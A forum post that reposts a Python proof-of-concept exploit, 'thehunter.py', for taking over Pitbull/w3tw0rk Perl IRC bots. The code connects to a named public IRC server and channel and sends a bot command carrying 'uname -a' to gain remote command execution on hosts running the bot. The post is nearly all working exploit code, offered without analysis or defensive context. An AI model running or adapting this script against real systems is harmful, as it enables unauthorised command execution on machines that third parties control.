Jump to content
KhiZaRix

Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution

Recommended Posts

Posted

# thehunter.py

# Pitbull / w3tw0rk Perl IRC Bot Remote Code Execution

# author: @shipcod3

# description: pitbull-w3tw0rk_hunter is POC exploit for Pitbull or w3tw0rk IRC Bot that takes over the owner of a bot which then allows Remote Code Execution.

import socket

import sys

def usage():

print("USAGE: python thehunter.py nick \n")

def main(argv):

if len(argv) < 2:

return usage()

#irc server connection settings

botnick = sys.argv[1] #admin payload for taking over the w3wt0rk bot

server = "us.dal.net" #irc server

channel = "#buhaypirata" #channel where the bot is located

irc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #defines the socket

print "connecting to:"+server

irc.connect((server, 6667)) #connects to the server

irc.send("USER "+ botnick +" "+ botnick +" "+ botnick +" :I eat w3tw0rk bots!\n") #user authentication

irc.send("NICK "+ botnick +"\n") #sets nick

irc.send("JOIN "+ channel +"\n") #join the chan

irc.send("PRIVMSG "+channel+" :!bot @System 'uname -a' \n") #send the payload to the bot

while 1: #puts it in a loop

text=irc.recv(2040) #receive the text

print text #print text to console

if text.find('PING') != -1: #check if 'PING' is found

irc.send('PONG ' + text.split() [1] + '\r\n') #returnes 'PONG' back to the server (prevents pinging out!)

if text.find('!quit') != -1: #quit the Bot

irc.send ("QUIT\r\n")

sys.exit()

if text.find('Linux') != -1:

irc.send("PRIVMSG "+channel+" :The bot answers to "+botnick+" which allows command execution \r\n")

irc.send ("QUIT\r\n")

sys.exit()

if __name__ == "__main__":

main(sys.argv)

Source: http://packetstorm.wowhacker.com/1504-exploits/thehunter.txt

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...